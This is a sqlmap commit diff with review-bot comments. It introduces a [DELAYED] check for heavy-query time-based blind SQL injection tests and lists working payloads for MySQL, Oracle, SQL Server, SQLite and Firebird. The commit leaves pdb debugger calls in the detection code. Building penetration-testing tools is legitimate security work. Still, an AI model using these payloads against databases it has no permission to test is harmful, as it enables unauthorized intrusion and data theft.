introducing [DELAYED] for heavy-query time-based payloads whose response time is non-deterministic

This commit is contained in:
Miroslav Stampar 2010-12-07 00:27:26 +00:00
parent 32f1909131
commit 61f82fd274
4 changed files with 40 additions and 39 deletions


@ -45,6 +45,8 @@ from lib.core.exception import sqlmapSiteTooDynamic
from lib.core.exception import sqlmapUserQuitException from lib.core.exception import sqlmapUserQuitException
from lib.core.session import setString from lib.core.session import setString
from lib.core.session import setRegexp from lib.core.session import setRegexp
from lib.core.settings import TIME_MIN_DELTA
from lib.core.settings import TIME_N_RESPONSE
from lib.request.connect import Connect as Request from lib.request.connect import Connect as Request
from plugins.dbms.firebird.syntax import Syntax as Firebird from plugins.dbms.firebird.syntax import Syntax as Firebird
from plugins.dbms.postgresql.syntax import Syntax as PostgreSQL from plugins.dbms.postgresql.syntax import Syntax as PostgreSQL
@ -351,11 +353,23 @@ def checkSqlInjection(place, parameter, value):
_ = Request.queryPage(reqPayload, place) _ = Request.queryPage(reqPayload, place)
duration = calculateDeltaSeconds(start) duration = calculateDeltaSeconds(start)
if duration >= conf.timeSec: if check.isdigit():
infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title) if duration >= int(check):
logger.info(infoMsg) infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
logger.info(infoMsg)
injectable = True injectable = True
elif check == "[DELAYED]":
if duration >= max(TIME_MIN_DELTA, TIME_N_RESPONSE * kb.responseTime):
import pdb
pdb.set_trace()
infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
logger.info(infoMsg)
injectable = True
else:
import pdb
pdb.set_trace()
# Restore old value of socket timeout # Restore old value of socket timeout
socket.setdefaulttimeout(popValue()) socket.setdefaulttimeout(popValue())
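Review bot: The new `[DELAYED]` branch and its `else:` commit `import pdb` / `pdb.set_trace()` (the two lines after the `max(TIME_MIN_DELTA, TIME_N_RESPONSE * kb.responseTime)` comparison and the two lines of the `else:` body), which drops any run that reaches this path into an interactive debugger and hangs a non-interactive run waiting on stdin. These read as leftover debugging aids rather than intended behaviour; delete both pairs, and since the `else:` is then empty, either drop it or give it a body such as `logger.warning("unknown <time> value '%s' in test '%s'" % (check, title))` so an unrecognised `<time>` value is reported instead of silently skipped. `checkSqlInjection` begins and ends outside the hunk, so I cannot see where `check` is populated; presumably it is the payload's `<time>` element. The threshold on the `[DELAYED]` line also assumes `kb.responseTime` is a measured number at this point — the `TIME_MIN_DELTA` floor covers a zero baseline but not a `None`, so confirm it is always set before this check runs.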


@ -1281,7 +1281,7 @@ def calculateDeltaSeconds(start, epsilon=0.1):
Returns elapsed time from start till now (including expected Returns elapsed time from start till now (including expected
error set by epsilon parameter) error set by epsilon parameter)
""" """
return int(time.time() - start - kb.responseTime + epsilon) return time.time() - start - kb.responseTime + epsilon
def initCommonOutputs(): def initCommonOutputs():
kb.commonOutputs = {} kb.commonOutputs = {}
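Review bot: Dropping the `int()` on the return line changes `calculateDeltaSeconds` from an integer to a float number of seconds, but the docstring is unchanged and still names neither the unit nor the type; propose `Returns elapsed time in seconds (float) from start till now, minus the measured baseline response time, plus the expected error set by the epsilon parameter`. Other callers of this helper are not visible here, so anything that relied on the truncated integer (for example equality comparisons or use as an index) should be checked. Note also that without the truncation `epsilon` is now a flat +0.1 s bias on every measurement, which nudges the `[DELAYED]` comparison in the caller toward a positive result; if that is intended, a one-line comment on the return line saying so would help.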


@ -48,6 +48,11 @@ DUMP_STOP_MARKER = "__STOP__"
PAYLOAD_DELIMITER = "\x00" PAYLOAD_DELIMITER = "\x00"
# settings used for delayed time payloads
TIME_MIN_DELTA = 1 # minimum difference of loading time in seconds
TIME_N_RESPONSE = 3 # minimum multiplicant of response time
# System variables # System variables
IS_WIN = subprocess.mswindows IS_WIN = subprocess.mswindows
# The name of the operating system dependent module imported. The following # The name of the operating system dependent module imported. The following
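Review bot: The inline comments on the two new constants should say what each is compared against, so a reader of settings.py does not have to find the use site: `TIME_MIN_DELTA = 1 # minimum extra loading time (seconds) before a [DELAYED] payload counts as injectable` and `TIME_N_RESPONSE = 3 # minimum multiplier of the measured baseline response time for the same check` ("multiplicant" is not the usual word). The factor of 3 is a heuristic rather than a measured bound; on a server whose response time fluctuates widely it may yield false positives, so a note that it is tunable would be useful to anyone adjusting detection thresholds.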


@ -1232,7 +1232,7 @@ Formats:
<comment>--</comment> <comment>--</comment>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>MySQL</dbms> <dbms>MySQL</dbms>
@ -1271,7 +1271,7 @@ Formats:
<comment>--</comment> <comment>--</comment>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>PostgreSQL</dbms> <dbms>PostgreSQL</dbms>
@ -1388,7 +1388,7 @@ Formats:
<comment>--</comment> <comment>--</comment>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>SQLite</dbms> <dbms>SQLite</dbms>
@ -1408,7 +1408,7 @@ Formats:
<comment>--</comment> <comment>--</comment>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>Firebird</dbms> <dbms>Firebird</dbms>
@ -1452,7 +1452,7 @@ Formats:
<payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload> <payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>MySQL</dbms> <dbms>MySQL</dbms>
@ -1484,29 +1484,11 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3</clause>
<where>1</where> <where>1</where>
<request>
<payload>AND (SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM DUAL)>0</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>Oracle AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
<request> <request>
<payload>AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0</payload> <payload>AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>Oracle</dbms> <dbms>Oracle</dbms>
@ -1524,7 +1506,7 @@ Formats:
<payload>AND (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0</payload> <payload>AND (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>Microsoft SQL Server</dbms> <dbms>Microsoft SQL Server</dbms>
@ -1532,7 +1514,7 @@ Formats:
</test> </test>
<test> <test>
<title>SQLite &gt; 2.0 AND time-based blind (heavy query)</title> <title>SQLite &gt; 2.0 AND time-based blind</title>
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
@ -1543,7 +1525,7 @@ Formats:
<payload>AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload> <payload>AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>SQLite</dbms> <dbms>SQLite</dbms>
@ -1563,7 +1545,7 @@ Formats:
<payload>AND (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload> <payload>AND (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>Firebird</dbms> <dbms>Firebird</dbms>
@ -1611,7 +1593,7 @@ Formats:
<payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload> <payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>MySQL</dbms> <dbms>MySQL</dbms>
@ -1647,7 +1629,7 @@ Formats:
<payload>OR (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0</payload> <payload>OR (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>Oracle</dbms> <dbms>Oracle</dbms>
@ -1665,7 +1647,7 @@ Formats:
<payload>OR (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0</payload> <payload>OR (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>Microsoft SQL Server</dbms> <dbms>Microsoft SQL Server</dbms>
@ -1673,7 +1655,7 @@ Formats:
</test> </test>
<test> <test>
<title>SQLite &gt; 2.0 OR time-based blind (heavy query)</title> <title>SQLite &gt; 2.0 OR time-based blind</title>
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>3</risk> <risk>3</risk>
@ -1684,7 +1666,7 @@ Formats:
<payload>OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload> <payload>OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>SQLite</dbms> <dbms>SQLite</dbms>
@ -1704,7 +1686,7 @@ Formats:
<payload>OR (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload> <payload>OR (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>Firebird</dbms> <dbms>Firebird</dbms>